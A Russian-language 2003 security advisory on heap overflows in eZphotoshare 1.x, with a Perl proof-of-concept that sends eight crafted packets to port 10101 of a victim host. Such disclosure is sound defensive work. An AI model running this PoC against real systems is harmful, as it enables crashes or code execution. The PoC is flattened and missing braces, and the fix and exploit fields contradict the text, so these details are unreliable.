Дата публикации: | 05.12.2003 |
Всего просмотров: | 1130 |
Опасность: | Средняя |
Наличие исправления: | Да |
Количество уязвимостей: | 1 |
CVE ID: | Нет данных |
Вектор эксплуатации: | Локальная сеть |
Воздействие: | Компрометация системы |
CWE ID: | Нет данных |
Наличие эксплоита: | Нет данных |
Уязвимые продукты: | eZphotoshare 1.x |
Уязвимые версии: eZphotoshare
Описание: Несколько переполнений буфера обнаружено в eZphotoshare. Удаленный пользователь может выполнить произвольный код на целевой системе. Удаленный пользователь моежет послать специально обработанный 80 байтовый пакет к 10101 порту последовательно 8 раз, чтобы перезаписать ECX и EAX регистры и выполнить произвольный код с привилегиями текущего пользователя. Пример/Эксплоит: #!/usr/bin/perl -w # Heap Corruption Vulnerability in eZphotoshare PoC # - by Peter Winter-Smith [peter4020@hotmail.com] use IO::Socket; if(!($ARGV[0])) print "Usage: eZpsheap.pl <victim>\n\n"; exit; print "Heap Corruption PoC\n"; for($n=1;$n<9;$n++){ $victim = IO::Socket::INET->new(Proto=>'tcp', PeerAddr=>$ARGV[0], PeerPort=>"10101") or die "Unable to connect to $ARGV[0] on port 10101"; $eax = "ABCD"; $ecx = "XXXX"; $packet = "GET /aaa" . $eax . $ecx . "a"x64; print $victim $packet; print " + Sending packet number $n of 8 ...\n"; sleep(1); close($victim); } print "Done.\n"; exit; URL производителя: http://www.ezphotoshare.com/ Решение:Способов устранения обнаруженной уязвимости не существует в настоящее время. |
|
Ссылки: | eZphotoshare Multiple Overflow Vulnerabilities |